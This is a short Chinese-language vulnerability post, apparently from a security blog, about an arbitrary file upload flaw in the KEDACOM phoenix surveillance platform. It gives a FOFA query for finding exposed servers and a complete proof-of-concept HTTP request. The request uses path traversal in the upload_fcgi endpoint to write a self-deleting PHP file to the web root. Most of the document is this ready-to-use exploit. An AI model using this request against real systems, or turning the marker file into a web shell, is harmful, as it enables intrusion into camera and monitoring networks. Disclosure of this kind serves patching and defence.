KEDACOM phoenix监控平台upload_fcgi任意文件上传漏洞
KEDACOM phoenix监控平台upload_fcgi任意文件上传漏洞
清晨 摸鱼划水 2025-05-22 08:17
FOFA
app="KEDACOM-phoenix监控平台"
POC
# 文件上传路径:/xhtjwvbhuocviluz.php
POST /pmc-bin/upload_fcgi?uploadDir=../&uploadName=xhtjwvbhuocviluz.php HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1v98KI1jc9w1bG97
Pragma: no-cache
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
----WebKitFormBoundary1v98KI1jc9w1bG97
Content-Disposition: form-data; name="Filedata": filename="aaaa"
Content-Type: image/jpeg
<?php echo 'tcrffkbmvbsbhxgtvzpptttxblclckrf';@unlink(__file__);?>
----WebKitFormBoundary1v98KI1jc9w1bG97--
漏洞来源:
【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游